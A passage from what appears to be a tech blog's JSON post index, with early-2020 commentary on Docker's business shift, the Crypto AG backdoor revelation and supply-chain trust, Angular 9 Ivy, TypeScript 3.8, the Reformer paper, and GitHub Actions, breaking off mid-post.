a developer-friendly CLI and image format, and the industry was never the same.\nBut Docker the company struggled to monetize Docker the technology. The open-source container runtime became a commodity almost immediately. When Docker tried to build an enterprise platform — Docker Swarm for orchestration, Docker Enterprise Edition for management — Kubernetes had already won that battle. Google\u0026rsquo;s backing, the CNCF ecosystem, and the sheer momentum of the Kubernetes community made Docker Swarm a hard sell to enterprise buyers.\nThe November 2019 deal saw Mirantis acquire Docker Enterprise, including Docker Swarm, Docker Trusted Registry, and the enterprise sales team. Docker retained Docker Desktop, Docker Hub, and about 300 employees. Scott Johnston took over as CEO with a mandate to focus on developers.\nDocker Desktop as the Core Product # If you\u0026rsquo;re a developer working on a Mac or Windows machine, Docker Desktop is probably already part of your daily workflow. It\u0026rsquo;s one of those tools that\u0026rsquo;s become so ubiquitous that you almost forget it\u0026rsquo;s a product someone has to build and maintain. Running Linux containers seamlessly on non-Linux operating systems is genuinely hard engineering — the Linux VM management, filesystem sharing, networking, and the integration with local tools all have to work together smoothly.\nDocker Desktop currently handles this remarkably well. The switch from the older Docker Toolbox (which used VirtualBox) to the native hypervisor integration (HyperKit on Mac, WSL 2 on Windows) was a significant improvement. On my MacBook Pro, starting a container takes seconds, and volume mounts — while still not as fast as native Linux — are workable for development.\nThe question is whether Docker Desktop alone can sustain a company. The current licensing model keeps it free for individual developers and small teams, but Docker has started signaling that enterprise features will come with a price tag. Features like vulnerability scanning, team management for Docker Hub, and enhanced security controls for Docker Desktop could form the basis of a subscription model.\nDocker Hub\u0026rsquo;s Critical Position # Docker Hub is Docker\u0026rsquo;s other crown jewel, and it\u0026rsquo;s in a stronger position than many people realize. With over 6 million repositories and billions of image pulls, Docker Hub is the de facto distribution mechanism for container images. Even if you run Kubernetes in production and never touch Docker\u0026rsquo;s runtime, there\u0026rsquo;s a good chance your base images come from Docker Hub.\nThis network effect is powerful but fragile. GitHub Packages is growing, Google Container Registry and Amazon ECR serve their respective clouds well, and projects like Harbor provide self-hosted alternatives. Docker Hub\u0026rsquo;s advantage is inertia and the sheer volume of existing content — every major open source project publishes official images there.\nThe recent introduction of rate limiting on Docker Hub pulls has been controversial but economically necessary. The infrastructure costs of serving billions of image pulls are substantial, and Docker needs revenue to survive. I expect we\u0026rsquo;ll see more tiering and paid features around Docker Hub in the coming months.\nThe Container Runtime Question # Here\u0026rsquo;s an interesting technical subplot: Kubernetes is moving away from Docker as a container runtime. The Container Runtime Interface (CRI) allows Kubernetes to use containerd or CRI-O directly, bypassing the Docker daemon entirely. This doesn\u0026rsquo;t mean Docker images stop working — they\u0026rsquo;re all OCI-compliant — but it does mean that in production Kubernetes clusters, the Docker daemon is increasingly unnecessary overhead. As Kubernetes matured, this decoupling from Docker became one of its defining architectural strengths.\nFor Docker Inc., this is actually fine. Their developer tools don\u0026rsquo;t depend on being the production runtime. As long as the image format remains standard (and it will — OCI has seen to that), Docker Desktop can be the place where developers build and test images, regardless of what runs them in production. It\u0026rsquo;s a narrower niche than \u0026ldquo;the entire container platform,\u0026rdquo; but it\u0026rsquo;s a defensible one.\nWhat concerns me slightly is the growing gap between development and production environments that this creates. If you\u0026rsquo;re building images with Docker but running them with containerd, there can be subtle differences in behavior — particularly around networking, storage drivers, and security contexts. In practice these differences are rare, but they exist, and they can make debugging production issues frustrating.\nMy Take # I\u0026rsquo;ve been using Docker since the 0.x days, back when it was still based on LXC and every other build broke something. The technology was transformative — it fundamentally changed how we think about packaging and deploying software. But the business always struggled with the classic open-source dilemma: how do you capture value from a technology that everyone uses but no one wants to pay for?\nDocker\u0026rsquo;s new focus is narrower but more honest. Developer tooling is a legitimate business — JetBrains has proven that developers will pay for tools that make them productive. Docker Desktop is genuinely useful, Docker Hub is genuinely critical infrastructure, and there\u0026rsquo;s a real opportunity to build a sustainable business around them.\nThe risk is that Docker tries to boil the ocean again — expanding into CI/CD, deployment, monitoring, or other areas where they\u0026rsquo;d face entrenched competition. The best thing Docker can do right now is make Docker Desktop the absolute best local development experience for containers, and make Docker Hub the most reliable and secure image registry. Do those two things well, and the business will follow.\nFor the rest of us, the lesson is simpler: Docker the company may change shape, but containers aren\u0026rsquo;t going anywhere. OCI standards ensure that the ecosystem survives regardless of any single vendor\u0026rsquo;s fortunes. And that\u0026rsquo;s exactly how infrastructure technology should work. The broader infrastructure-as-code movement demonstrates how containerization fits into the larger operational picture.\nThis post is part of my Infrastructure Notes series, tracking the tools and platforms that shape how we build and deploy software.\n","date":"20 February 2020","externalUrl":null,"permalink":"/posts/200220-docker-desktop-new-direction/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Three months after selling Docker Enterprise to Mirantis, Docker Inc. is refocusing on developer experience. What does this mean for the container ecosystem?","title":"Docker's Second Act — Finding Its Place After the Enterprise Sell-Off","type":"posts"},{"content":"Two days ago, the Washington Post and German broadcaster ZDF published what might be the most significant intelligence story in years. For decades, the CIA and German BND secretly owned Crypto AG, a Swiss company that sold encryption equipment to over 120 countries. The devices were rigged — the intelligence agencies could read the encrypted communications of their customers. Governments, militaries, and diplomats around the world were paying good money for equipment that was designed to betray them. This echoes broader patterns we\u0026rsquo;d seen just a month earlier with the NSA\u0026rsquo;s CVE disclosure and foreshadows future incidents like the SolarWinds supply chain attack.\nThe operation, codenamed \u0026ldquo;Thesaurus\u0026rdquo; and later \u0026ldquo;Rubicon,\u0026rdquo; ran from 1970 until at least 2018. Let that sink in. Nearly fifty years of compromised encryption, sold by a \u0026ldquo;neutral\u0026rdquo; Swiss company that was actually a front for Western intelligence services.\nThe Technical Mechanics of Betrayal # The beauty — if you can call it that — of the operation was its subtlety. Crypto AG didn\u0026rsquo;t sell devices that didn\u0026rsquo;t encrypt. They sold devices that encrypted and included a hidden channel that allowed the CIA and BND to recover the plaintext. The specific techniques evolved over the decades, but the general approach involved weakening the random number generation or including covert parameters in the key exchange that only the agencies knew how to exploit.\nIn the mechanical cipher era, this meant manipulating the cipher wheels. In the electronic era, it meant embedding weaknesses in the algorithms that weren\u0026rsquo;t detectable through black-box testing. The devices appeared to work perfectly — messages were encrypted and decrypted as expected. You\u0026rsquo;d need access to the source code or detailed hardware schematics to spot the backdoor, and Crypto AG controlled both.\nThis is a masterclass in supply chain compromise, executed at a scale and duration that dwarfs anything we\u0026rsquo;ve seen in the software world. It makes the Juniper Networks backdoor discovered in 2015 look like amateur hour. The implications for modern software would become starkly clear just years later with the SolarWinds supply chain attack and subsequent open source ecosystem compromises.\nSupply Chain Trust Is the Fundamental Problem # For those of us building software systems, the Crypto AG story is a vivid illustration of a problem we grapple with daily: how do you trust your supply chain? Every application we build stands on a tower of dependencies — operating systems, compilers, libraries, hardware, and cloud services — that we largely take on faith.\nKen Thompson laid this out in his 1984 Turing Award lecture, \u0026ldquo;Reflections on Trusting Trust.\u0026rdquo; He demonstrated that a compiler could be modified to insert a backdoor into any program it compiled, including future versions of itself, with no trace in the source code. Crypto AG proves that this isn\u0026rsquo;t just a theoretical exercise — it\u0026rsquo;s a strategy that intelligence agencies will pursue for decades. The White House would eventually convene policy makers to address these systemic security risks.\nIn the modern software ecosystem, we\u0026rsquo;re arguably more vulnerable than Crypto AG\u0026rsquo;s customers were. Consider:\nnpm, PyPI, and other package registries host hundreds of thousands of packages, many maintained by anonymous individuals Cloud providers manage the hardware and hypervisors our code runs on CI/CD pipelines execute arbitrary code with access to our secrets Hardware manufacturers control the firmware and microcode in our processors We perform audits, we review code, we use reproducible builds where we can. But the honest truth is that the complexity of modern systems makes comprehensive verification effectively impossible.\nThe Open Source Angle # One argument you\u0026rsquo;ll hear is that open source solves this problem — with enough eyes, all bugs are shallow, and backdoors can\u0026rsquo;t hide in public code. There\u0026rsquo;s some truth to this. An open-source encryption library is harder to backdoor than a proprietary black-box device. But \u0026ldquo;harder\u0026rdquo; isn\u0026rsquo;t \u0026ldquo;impossible.\u0026rdquo;\nThe OpenSSL Heartbleed vulnerability persisted for two years in one of the most widely-used open source projects in the world. It wasn\u0026rsquo;t a deliberate backdoor (as far as we know), but it demonstrated that critical code can go unreviewed for extended periods. The Debian OpenSSL fiasco of 2008, where a well-meaning maintainer accidentally crippled the random number generator, showed how easy it is to introduce cryptographic weaknesses without malice.\nIf we can\u0026rsquo;t reliably catch accidental cryptographic weaknesses in open source code, catching deliberate, cleverly-designed ones is even harder. The Crypto AG engineers who implemented the backdoors were skilled cryptographers who understood exactly how to introduce weaknesses that would survive casual review.\nWhat This Means for Security Architecture # The practical takeaway isn\u0026rsquo;t to throw up your hands and declare all encryption compromised. It\u0026rsquo;s to design systems with the assumption that any single component might be compromised. Defense in depth isn\u0026rsquo;t just a buzzword — it\u0026rsquo;s the only rational response to a world where your encryption vendor might be owned by an intelligence agency.\nSpecifically:\nLayer your encryption. Don\u0026rsquo;t rely on a single encryption implementation. TLS for transport plus application-layer encryption using a different library gives you resilience against compromise of either one. Diversify your trust. Use components from different vendors, different countries, different development teams. A backdoor in one is less useful if it\u0026rsquo;s wrapped in another layer the adversary can\u0026rsquo;t break. Verify where you can. Reproducible builds, binary verification, and periodic audits of critical dependencies aren\u0026rsquo;t paranoia — they\u0026rsquo;re hygiene. Assume breach. Design your systems so that compromise of any single component limits the blast radius. Segment networks, rotate keys, minimize data retention. My Take # I\u0026rsquo;ve been in this industry long enough to not be shocked by intelligence agencies doing intelligence agency things. What strikes me about the Crypto AG story isn\u0026rsquo;t the betrayal itself — it\u0026rsquo;s the duration and scale. Fifty years. Over a hundred countries. And it only came to light because journalists did the digging.\nAs software engineers, we\u0026rsquo;re building the infrastructure that societies depend on. The Crypto AG revelation should make us deeply uncomfortable about the trust assumptions baked into our systems. Not because we should suspect every dependency of being a CIA front, but because it proves that sustained, sophisticated supply chain compromises are not theoretical.\nThe next time someone tells you that your threat model is too paranoid, point them to Crypto AG. A Swiss company that sold encryption to governments for half a century, and it was all a lie. Sometimes paranoia is just good engineering.\nThis post is part of my ongoing series examining security in practice — real incidents with real lessons for working engineers.\n","date":"13 February 2020","externalUrl":null,"permalink":"/posts/200213-cia-crypto-ag-backdoor/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Washington Post reveals the CIA secretly owned Crypto AG for decades, selling compromised encryption to governments worldwide. The supply chain trust implications are staggering.","title":"The Crypto AG Revelation — When Your Encryption Vendor Is the Intelligence Agency","type":"posts"},{"content":"Angular 9 shipped today, and with it, the Ivy rendering engine is finally the default. If you\u0026rsquo;ve been following the Angular project for the past couple of years, you know this has been a long time coming. The team first previewed Ivy at ng-conf 2018, and after a cautious opt-in period during Angular 8, it\u0026rsquo;s now front and center. For those of us who\u0026rsquo;ve watched framework rewrites go sideways more than once, this is a noteworthy moment — not because it\u0026rsquo;s revolutionary, but because it actually landed. This aligns with the broader language evolution we\u0026rsquo;d seen in TypeScript 3.8 with improved type safety features for application code.\nWhat Ivy Actually Changes # At its core, Ivy is a complete rewrite of Angular\u0026rsquo;s rendering pipeline — the compiler and runtime that turns your templates into executable code. The previous engine, View Engine, worked fine but produced larger bundles and was harder to tree-shake effectively. Ivy addresses this by generating code that\u0026rsquo;s more amenable to dead code elimination.\nThe practical results are encouraging. Early adopters during the Angular 8 opt-in period reported meaningful reductions in bundle size, particularly for smaller applications. The Angular team\u0026rsquo;s own benchmarks show bundle sizes dropping by around 25-40% for modest apps. For large enterprise applications — which is where Angular lives and breathes — the gains are more incremental, but still welcome.\nCompilation speed is the other headline improvement. Ivy\u0026rsquo;s locality principle means that each component can be compiled independently, without needing to analyze the entire application. This translates to faster rebuilds during development, which is something every developer appreciates. The --aot flag is now the default for ng serve, which means you catch template errors during development rather than at build time. That alone is worth the upgrade.\nThe Template Type-Checking Story # One of the less flashy but more impactful changes is improved template type-checking. Angular has always had an advantage over React in that templates are structured and analyzable, but the type-checking was historically a bit loose. With Ivy, the strictTemplates option in tsconfig.json enables much more thorough checking of template expressions.\nI\u0026rsquo;ve been experimenting with this in a side project, and it catches real bugs — mistyped property names, incorrect event bindings, type mismatches in pipes. If you\u0026rsquo;re already using TypeScript for its type safety (and you should be), having that safety extend into your templates is a natural evolution. It\u0026rsquo;s not quite at the level of what Elm gives you, but it\u0026rsquo;s a significant step for a mainstream framework.\n// tsconfig.json { \u0026#34;angularCompilerOptions\u0026#34;: { \u0026#34;strictTemplates\u0026#34;: true, \u0026#34;strictInjectionParameters\u0026#34;: true, \u0026#34;strictInputAccessModifiers\u0026#34;: true } } I\u0026rsquo;d recommend enabling these flags on any new project immediately. For existing projects, you can enable them incrementally — the compiler will tell you exactly what needs fixing.\nUpgrade Path and Migration # The Angular team deserves credit for their upgrade tooling. Running ng update @angular/core @angular/cli handles most of the migration automatically, including updating RxJS imports to use the tree-shakeable format and adjusting for deprecated APIs. I ran it on a medium-sized project (about 150 components) and the automatic migration handled roughly 90% of the changes. This level of tooling maturity represents how frameworks have learned from earlier transitions, much like the TypeScript evolution showed a commitment to manageable upgrades.\nThe remaining 10% were mostly edge cases around ViewChild and ContentChild queries, which now require an explicit static flag. It\u0026rsquo;s a minor inconvenience that makes the behavior more predictable:\n// Before: timing was implicit and confusing @ViewChild(\u0026#39;myRef\u0026#39;) myRef: ElementRef; // After: you declare when you need the reference @ViewChild(\u0026#39;myRef\u0026#39;, { static: true }) myRef: ElementRef; // Available in ngOnInit @ViewChild(\u0026#39;myRef\u0026#39;, { static: false }) myRef: ElementRef; // Available in ngAfterViewInit This is the kind of breaking change I can get behind — it makes implicit behavior explicit, reducing a whole category of timing-related bugs.\nThe Broader Framework Landscape # Angular 9 arrives at an interesting moment. React continues to dominate mindshare, Vue 3 is in development with its own Composition API, and Svelte is generating excitement with its compiler-first approach. Angular\u0026rsquo;s position has always been as the \u0026ldquo;enterprise choice\u0026rdquo; — opinionated, batteries-included, TypeScript-first.\nWith Ivy, Angular doesn\u0026rsquo;t suddenly become hip or trendy, and that\u0026rsquo;s fine. What it does is become more competitive on the metrics that matter: bundle size, compilation speed, and developer experience. The framework still has a steeper learning curve than React or Vue, and the module system remains more ceremony than I\u0026rsquo;d like. But for teams building large, long-lived applications with complex forms and routing, Angular\u0026rsquo;s structure is a feature, not a bug.\nMy Take # I\u0026rsquo;ve been building web applications since before jQuery was a thing, and if there\u0026rsquo;s one pattern I\u0026rsquo;ve seen repeatedly, it\u0026rsquo;s that the best framework rewrites are the boring ones. The ones that improve things incrementally while maintaining backward compatibility. Ivy is exactly that — no flashy new syntax, no paradigm shifts, just a better engine under the hood.\nThe real test will be how the ecosystem adapts. Libraries need to be compiled with Ivy-compatible versions, and while the Angular team has provided a compatibility compiler (ngcc) to bridge the gap, it adds overhead to node_modules processing. I expect this transitional pain to last about six months before most maintained libraries ship Ivy-native builds.\nIf you\u0026rsquo;re on Angular 8, upgrade. If you\u0026rsquo;re on Angular 7 or earlier, plan your upgrade path — the tooling makes it smoother than you\u0026rsquo;d expect. And if you\u0026rsquo;re not using Angular at all, this release alone probably won\u0026rsquo;t change your mind. But it should reassure anyone who bet on Angular that the framework is in good hands.\nThis post is part of my weekly series covering the developer landscape as it evolves throughout 2020.\n","date":"6 February 2020","externalUrl":null,"permalink":"/posts/200206-angular-9-ivy-compiler/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Angular 9 arrives with the Ivy compiler as default, delivering on years of promises about smaller bundles and faster compilation.","title":"Angular 9 Lands with Ivy — The Rewrite That Actually Shipped","type":"posts"},{"content":"The TypeScript team announced the 3.8 beta this week, and it\u0026rsquo;s a release that I think deserves more attention than the version number suggests. While it doesn\u0026rsquo;t have the headline-grabbing appeal of optional chaining (that was 3.7), the features in 3.8 signal important shifts in both TypeScript and the broader JavaScript ecosystem. These language improvements were arriving just as frameworks like Angular 9 with its Ivy compiler were focusing on their own modernization efforts.\nThe two headliners: ECMAScript private fields and top-level await. Both are features that change how you structure code in meaningful ways.\nECMAScript Private Fields — Finally, Real Privacy # TypeScript has had the private keyword since day one. But here\u0026rsquo;s the thing that catches people off guard: TypeScript\u0026rsquo;s private is a compile-time-only concept. At runtime, the property is completely accessible. It\u0026rsquo;s a gentlemen\u0026rsquo;s agreement enforced by the type checker, not by the JavaScript engine.\nECMAScript private fields, using the # prefix syntax, are different. They\u0026rsquo;re truly private at runtime:\nclass Person { #name: string; constructor(name: string) { this.#name = name; } greet() { console.log(`Hello, I\u0026#39;m ${this.#name}`); } } const p = new Person(\u0026#34;Osmond\u0026#34;); p.#name; // Error! Property \u0026#39;#name\u0026#39; is not accessible // outside class \u0026#39;Person\u0026#39; because it has a // private identifier. The #name field literally doesn\u0026rsquo;t exist from outside the class. You can\u0026rsquo;t access it with bracket notation, you can\u0026rsquo;t find it with Object.keys(), and you can\u0026rsquo;t reach it through the prototype chain. This is enforcement by the JavaScript engine, not the type checker.\nNow, I can already hear the pragmatists asking: \u0026ldquo;Why do I need this when TypeScript\u0026rsquo;s private keyword works fine?\u0026rdquo; Fair question. Here\u0026rsquo;s why it matters:\nLibrary authors: If you publish a library, your private members are accessible to consumers who use JavaScript directly (or who use // @ts-ignore). True private fields mean your internal implementation details are genuinely hidden.\nSecurity-sensitive code: In scenarios where you\u0026rsquo;re handling credentials, tokens, or sensitive state, compile-time privacy isn\u0026rsquo;t sufficient. # fields prevent any runtime inspection. This is especially important as frameworks implement more sophisticated state management.\nFuture-proofing: This is the direction ECMAScript is going. The class fields proposal is at Stage 3, which means it\u0026rsquo;s essentially locked in for JavaScript. TypeScript is aligning with the language it compiles to.\nThat said, there are practical concerns. The # syntax is polarizing — it looks foreign to developers coming from Java, C#, or even TypeScript\u0026rsquo;s own private keyword. There will be a period where codebases have a mix of private and # fields, which could be confusing.\nMy recommendation: for new code in libraries that are consumed externally, prefer # fields. For application code where everything goes through the TypeScript compiler, private is still perfectly fine.\nTop-Level Await — A Bigger Deal Than It Looks # The second major feature is support for top-level await. Currently, you can only use await inside an async function:\n// Before: awkward IIFE wrapper (async () =\u0026gt; { const data = await fetch(\u0026#34;/api/config\u0026#34;); const config = await data.json(); // use config... })(); With top-level await, you can write this at the module level:\n// After: clean and direct const data = await fetch(\u0026#34;/api/config\u0026#34;); const config = await data.json(); export { config }; This is particularly valuable for:\nModule initialization: Modules that need to load configuration, establish database connections, or perform other async setup can now do so cleanly. Scripts and tooling: CLI tools and scripts that are essentially one big async operation no longer need the IIFE dance. Dynamic imports: You can await import(\u0026quot;./module\u0026quot;) at the top level, enabling conditional module loading patterns. The catch — and it\u0026rsquo;s an important one — is that top-level await only works in ES modules, not CommonJS. TypeScript enforces this by requiring \u0026quot;module\u0026quot;: \u0026quot;esnext\u0026quot; or \u0026quot;module\u0026quot;: \u0026quot;system\u0026quot; in your tsconfig.json. If you\u0026rsquo;re still shipping CommonJS (which many Node.js projects are), you\u0026rsquo;ll need to evaluate whether the module system switch is worth it.\nThere\u0026rsquo;s also a subtlety around execution order. When module A uses top-level await, any module that imports from A will wait for that await to resolve before executing. This creates implicit asynchronous dependencies in your module graph, which can affect startup performance if you\u0026rsquo;re not careful.\nExport * As Namespace # The third feature is less dramatic but solves a real annoyance:\nexport * as utilities from \u0026#34;./utilities\u0026#34;; This re-exports everything from ./utilities as a namespace object. Previously, you had to do this in two steps:\nimport * as utilities from \u0026#34;./utilities\u0026#34;; export { utilities }; It\u0026rsquo;s a small quality-of-life improvement that makes barrel files (index.ts re-export modules) cleaner. If you maintain libraries with complex module structures, you\u0026rsquo;ll appreciate this.\nType-Only Imports and Exports # Perhaps the most practically useful feature for day-to-day development is the new import type syntax:\nimport type { SomeType } from \u0026#34;./module\u0026#34;; This explicitly marks an import as type-only, meaning it will be completely erased during compilation. No runtime import, no side effects, no bundle size impact.\nThis solves a genuine problem. With regular imports, TypeScript has to figure out whether you\u0026rsquo;re using the import as a value (which needs to stay in the emitted JavaScript) or only as a type (which can be erased). In most cases it gets this right, but there are edge cases — particularly with re-exports and isolatedModules mode — where the ambiguity causes issues.\nWith import type, the intent is explicit. I expect this to become a best practice, especially in projects using bundlers where tree-shaking depends on clean import analysis.\nThe Bigger Picture # What I find interesting about TypeScript 3.8 is how much of it is about alignment with ECMAScript proposals. Private fields, top-level await, and export * as namespace are all TC39 proposals that TypeScript is implementing. This is TypeScript doing what it does best: giving you early access to future JavaScript features with type safety bolted on.\nThe pace of TypeScript releases continues to be impressive. We\u0026rsquo;ve gotten optional chaining, nullish coalescing, and now private fields and top-level await — all within a few months. The TypeScript team\u0026rsquo;s ability to ship meaningful features on a regular cadence while maintaining backward compatibility is, frankly, the gold standard for language evolution. The Python 2/3 situation this language is not.\nMy Take # TypeScript 3.8 is a solid, pragmatic release. The features aren\u0026rsquo;t revolutionary on their own, but they collectively make TypeScript a more complete and more aligned superset of JavaScript.\nIf I had to pick one feature to adopt immediately, it would be import type. It costs nothing, makes your intent explicit, and prevents a class of subtle bundling issues. Private fields with # are great for library authors but can wait for broader ecosystem adoption. Top-level await is powerful but requires careful thought about your module system.\nThe TypeScript team continues to be one of the best examples of language stewardship in the industry. They ship often, break almost nothing, and consistently make developers\u0026rsquo; lives better. That\u0026rsquo;s not a bad way to start the decade.\n","date":"30 January 2020","externalUrl":null,"permalink":"/posts/200130-typescript-3-8-private-fields-top-level-await/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 3.8 beta brings ECMAScript private fields, top-level await, and export * as syntax. These features signal where JavaScript itself is heading.","title":"TypeScript 3.8 Beta — Private Fields and Top-Level Await Land","type":"posts"},{"content":"Google Research published a paper this week that caught my attention: Reformer: The Efficient Transformer. In a field that\u0026rsquo;s been racing toward ever-larger models — GPT-2\u0026rsquo;s 1.5 billion parameters, Megatron-LM\u0026rsquo;s 8.3 billion — this paper asks a different question: can we make Transformers dramatically more efficient without sacrificing quality?\nAs someone who\u0026rsquo;s been trying to integrate ML models into production systems that don\u0026rsquo;t have Google\u0026rsquo;s budget, this is the kind of research I\u0026rsquo;ve been waiting for.\nThe Problem With Current Transformers # The Transformer architecture, introduced in the landmark \u0026ldquo;Attention Is All You Need\u0026rdquo; paper in 2017, has become the dominant architecture for natural language processing. BERT, GPT-2, XLNet — they\u0026rsquo;re all Transformers under the hood.\nBut there\u0026rsquo;s a dirty secret: Transformers are absurdly expensive to run. The self-attention mechanism that makes them so powerful has O(N²) complexity with respect to sequence length. Double the input length, and you quadruple the compute and memory requirements.\nIn practice, this means:\nBERT is limited to 512 tokens (roughly a page of text). Want to process a full document? You have to chunk it. GPT-2 Large needs multiple GPUs just for inference. Fine-tuning it requires hardware that costs thousands per month. Processing long sequences — full articles, codebases, conversation histories — is either impossible or requires ugly workarounds like sliding windows. For those of us building practical applications, these constraints are real barriers. I\u0026rsquo;ve been working on a document analysis feature where the 512-token limit means we lose context across sections. It works, but it\u0026rsquo;s a compromise.\nWhat Reformer Changes # The Reformer paper introduces two key innovations that together reduce the memory and compute requirements dramatically:\nLocality-Sensitive Hashing (LSH) Attention # Standard self-attention computes attention weights between every pair of tokens. For a sequence of length N, that\u0026rsquo;s N² attention computations. Reformer replaces this with locality-sensitive hashing, which groups similar tokens into buckets and only computes attention within those buckets.\nThe intuition is straightforward: in practice, most attention weights are very small. Only a few tokens actually attend strongly to each other. LSH is a way to approximately find those important pairs without checking every combination. This reduces the attention complexity from O(N²) to O(N log N).\nThe trade-off is that it\u0026rsquo;s an approximation. You might miss some attention connections that standard Transformers would catch. The paper shows this doesn\u0026rsquo;t significantly hurt quality on the benchmarks they tested, but it\u0026rsquo;s something to watch as people push the boundaries.\nReversible Residual Layers # The second innovation tackles memory. In a standard Transformer, you need to store the activations from every layer during training for the backward pass. For a model with many layers and long sequences, this eats enormous amounts of GPU memory.\nReformer uses reversible residual connections (from a 2017 paper by Gomez et al.) that allow you to recompute activations during the backward pass instead of storing them. You trade compute for memory — the backward pass is slower, but you need far less GPU RAM.\nThe combined effect is striking. The paper demonstrates processing sequences of 64,000 tokens on a single GPU. For context, that\u0026rsquo;s 125x longer than BERT\u0026rsquo;s 512-token limit. On a single GPU.\nWhy This Matters for Practitioners # I think there are two groups who should pay attention to Reformer:\nApplication developers who want to use Transformers for tasks involving long documents, code analysis, or conversation systems. The sequence length limitation has been the single biggest practical constraint. If Reformer-style models become available in frameworks like Hugging Face\u0026rsquo;s transformers library (which I expect will happen within months), it opens up use cases that were previously impractical.\nTeams with limited compute budgets — which is most of us. The trend of ever-larger models has been creating a divide between organizations that can afford massive GPU clusters and everyone else. Efficiency research like Reformer is the counterweight. If you can get 90% of the quality at 10% of the cost, that\u0026rsquo;s a viable trade-off for most production systems.\nThe paper also has implications for code understanding. Source code files are often much longer than 512 tokens, and understanding code requires long-range dependencies (a function defined at line 50 might be called at line 500). Current Transformer-based code models are severely limited by sequence length. Reformer\u0026rsquo;s ability to handle 64K tokens could unlock significantly better code analysis tools.\nWhat\u0026rsquo;s Still Missing # Let me temper the enthusiasm with some practical concerns:\nNo pre-trained models yet: The paper presents the architecture and benchmarks, but there\u0026rsquo;s no \u0026ldquo;Reformer-Base\u0026rdquo; that you can download and fine-tune today. Training these models from scratch still requires significant resources. Approximation trade-offs: The LSH attention is approximate. For tasks where precise long-range attention patterns are critical, the quality gap might be larger than the paper\u0026rsquo;s benchmarks suggest. Engineering complexity: Implementing LSH attention and reversible layers correctly is non-trivial. Until this is well-supported in major frameworks (PyTorch, TensorFlow), adoption will be limited to research teams. Inference vs. training: The reversible layers mainly help with training memory. Inference benefits come primarily from the LSH attention. For serving models in production, the speedup may be more modest than the training improvements suggest. My Take # The AI field has been in a \u0026ldquo;bigger is better\u0026rdquo; arms race for the past two years. More parameters, more data, more GPUs. The results have been impressive — GPT-2\u0026rsquo;s text generation and BERT\u0026rsquo;s NLU capabilities are genuinely remarkable. But this trajectory is unsustainable and exclusionary.\nResearch like Reformer represents the other path: making powerful architectures accessible. I\u0026rsquo;d argue this direction is ultimately more impactful for the industry. A model that runs on a single GPU and handles long sequences opens doors for thousands of teams. A model that requires a 256-GPU cluster is a demo for a conference talk.\nI\u0026rsquo;ll be watching for when Reformer-style attention makes it into the Hugging Face ecosystem. That\u0026rsquo;s when the real experimentation begins — not when the paper is published, but when practitioners can pip install it and start building. For now, the paper is worth reading if you work with NLP or are interested in where Transformer architectures are heading. The math isn\u0026rsquo;t trivial, but the key ideas — hash-based approximate attention and reversible computation — are elegant and intuitive.\nThe race to make AI practical is just as important as the race to make it powerful.\n","date":"23 January 2020","externalUrl":null,"permalink":"/posts/200123-reformer-efficient-transformers/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s new Reformer model tackles the massive memory and compute costs of Transformers. For engineers building AI-powered features, this matters more than another benchmark score.","title":"Reformer — Can We Make Transformers Practical for the Rest of Us?","type":"posts"},{"content":"It\u0026rsquo;s been about two months since GitHub Actions went generally available in November 2019, and the dust is starting to settle. I\u0026rsquo;ve been migrating several projects from Travis CI and CircleCI over the holiday break, and I want to share what I\u0026rsquo;m seeing — because I think the CI/CD landscape is about to shift in a way we haven\u0026rsquo;t seen since Jenkins went mainstream. As we\u0026rsquo;ve seen with infrastructure-as-code platforms, tooling integration and automation are becoming foundational to modern development practices.\nThe Marketplace Effect # The most underappreciated aspect of GitHub Actions isn\u0026rsquo;t the YAML syntax or the runner infrastructure — it\u0026rsquo;s the marketplace. The GitHub Marketplace for Actions already has thousands of pre-built actions, and the number is growing rapidly.\nThis is the network effect at work. When your CI/CD system lives in the same platform as your code, your issues, your pull requests, and your package registry, the friction for creating and sharing automation drops to nearly zero. Want to add Slack notifications? There\u0026rsquo;s an action for that. Need to deploy to AWS? Dozens of options. Want to auto-label PRs based on file paths? Five minutes of YAML.\nCompare this to writing a Jenkins plugin (Java, XML configuration, release process) or even a CircleCI orb (still requires its own repo, versioning, and publication). GitHub Actions reduced the barrier to \u0026ldquo;put a action.yml in a repo and push.\u0026rdquo; The result is an explosion of community-contributed automation.\nIn my experience over the last two months, I\u0026rsquo;d say about 70% of what I need is already available as a published action. The remaining 30% is custom logic that I can write as a simple shell script right in the workflow file.\nWhat Migration Actually Looks Like # I\u0026rsquo;ve been moving Node.js and Python projects, and here\u0026rsquo;s the honest assessment:\nWhat\u0026rsquo;s great:\nThe integration with pull requests is seamless. Status checks, annotations on specific lines of code, automatic check runs — it all just works because it\u0026rsquo;s native to the platform. Matrix builds are well-designed. Testing across Node 10/12/14 and Ubuntu/macOS/Windows is a clean, declarative matrix in YAML. The free tier is generous for open source: unlimited minutes on public repos. For private repos, you get 2,000 minutes/month on the free plan. Secrets management is straightforward. Repository and organization secrets integrate cleanly. What\u0026rsquo;s rough:\nDebugging failed workflows is painful. You can\u0026rsquo;t SSH into a runner to inspect state (unlike CircleCI). You\u0026rsquo;re reading log output and re-pushing commits to trigger reruns. There are community actions that set up tmate sessions, but it\u0026rsquo;s a workaround. Caching is better than it was in beta but still not as intelligent as some competitors. The actions/cache action requires you to explicitly define cache keys and paths. YAML verbosity is real. Complex workflows with multiple jobs, conditions, and matrix strategies can become walls of YAML that are hard to review. The documentation, while improving, has gaps. I\u0026rsquo;ve found myself reading the source code of official actions to understand edge cases. The Travis CI Question # Let\u0026rsquo;s address the elephant in the room. Travis CI has been the default CI for open-source projects hosted on GitHub for the better part of a decade. That .travis.yml file has been a standard fixture in open-source repos.\nWith GitHub Actions offering unlimited free CI for public repos, with deeper GitHub integration, and without the pricing concerns that have dogged Travis CI since its acquisition by Idera in 2019 — the writing seems to be on the wall. This mirrors broader ecosystem consolidation patterns we\u0026rsquo;ve seen in open source, where platform decisions have profound impacts on communities.\nI\u0026rsquo;ve already noticed a trend in the open-source projects I follow: new projects almost universally choose GitHub Actions. Established projects are starting to add GitHub Actions workflows alongside their existing Travis configs, often with plans to deprecate the latter.\nThis isn\u0026rsquo;t necessarily a good thing. Monoculture in developer tooling carries risks. When GitHub had its outages in the past, it already took out code hosting, issue tracking, and package 